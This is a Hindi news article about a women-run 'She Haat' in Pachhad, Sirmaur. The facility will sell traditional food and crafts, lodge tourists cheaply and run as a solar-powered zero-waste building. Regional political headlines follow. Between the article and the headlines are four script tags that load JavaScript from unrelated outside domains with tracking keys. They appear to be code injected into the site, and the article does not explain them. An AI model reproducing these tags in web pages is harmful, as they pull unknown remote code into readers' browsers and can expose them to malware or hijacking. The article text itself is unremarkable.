<p>जिला सिरमौर के पच्छाद विधानसभा क्षेत्र की महिलाओं की आर्थिकी मजबूत हो और महिलाओं को घर द्वार पर रोजगार मिलें इसके लिए प्रदेश में अपनी तरह का पहला ‘शी हाट’ जल्द ही शुरू किया जा रहा है जिसका आज पच्छाद के बाग पशोग क्षेत्र में विधिवत रूप से शिलान्यास किया गया। शी हाट खोलने का मुख्य उद्देश्य स्थानीय महिलाओं की आर्थिकी मजबूत करने के साथ पारंपरिक वस्तुओं और खाने के सामान को पहचान दिलाना है। इस शी हाट में केवल महिलाएं ही कार्य करेंगी जिसके लिए शुरुआती चरण में 25 महिलाओं का चयन किया गया है।</p>
<p>यहां महिलायें पर्यटकों के लिए पारंपरिक व्यंजन के साथ पत्तों से बने डोने, पतलों, कपड़े के थैलों समेत अन्य वस्तुओं को बेचा जायेगा। स्थानीय महिलाएं शी हाट के जल्द शुरू होने से काफी उत्साहित है। स्थानीय महिलाओ का कहना है के घर द्वार पर रोजगार के अवसर से उन्हें उनकी आर्थिकी मजबूत करने में बहुत सहायता मिलेगी और वो अपने परिवार के लालन पोषण में अपना सहयोग ओर बढ़ा पाएगी। शी हाट का शिलान्यास करने पहुंचे सांसद सुरेश कश्यप ने कहा कि इस शी-हाट में महिलाओं द्वारा तैयार किए गए पारम्परिक उत्पादों को प्रदर्शित करने के अतिरिक्त विक्रय केंद्र की सुविधा भी यहीं मिल पाएगी।</p>
<p>कश्यप ने कहा कि शी-हाट में रियायती दरों पर पर्यटकों के लिए ठहरने की व्यवस्था होगी जहां महिलाओं द्वारा पर्यटकों के लिए पारंपरिक भोजन और पेय पदार्थों की सुविधा उपलब्ध करवाई जाएगी। महिलाओं की आर्थिकी सुदृढ़ करने के साथ इस शी हाट में एक ज़ीरो वेस्ट भवन बनेगा जो सौर ऊर्जा से कार्य करेगा। इस भवन में रूफ टॉप हार्वेस्टिंग, प्लास्टिक कचरे से पॉलीब्रिक्स और गीले कचरे से खाद और बायोगैस के प्रबंधन का प्रावधान होगा। उन्होंने बताया कि इसमें छोटे बायोगैस संयत्र को चलाने के लिए रसोई और शौचालय के कचरे का उपयोग किया जाएगा जो रसोई के लिए आवश्यक ईंधन प्रदान करेगा।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1580291176116″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
-मुख्यमंत्री सुखविंदर सुक्खू ने राणा की गृह पंचायत की पेयजल समस्या सुलझाई -कैप्टन रणजीत सिंह…
मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू की नीतियों में आस्था जता रहे भाजपाई मतदान की तारीख…
मुख्य निर्वाचन अधिकारी, मनीष गर्ग ने आज यहां सभी राज्य नोडल अधिकारियों को चुनाव व्यय…
निर्वाचन विभाग के एक प्रवक्ता ने आज यहां जानकारी दी कि आगामी लोकसभा तथा विधानसभा…
धर्मशाला(कांगड़ा), 17 मई: जिला कांगड़ा के दुर्गम क्षेत्र मुल्थान में एक पनबिजली परियोजना की टनल…
सुजानपुर: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने कहा कि सुजानपुर के पूर्व विधायक राजेंद्र राणा…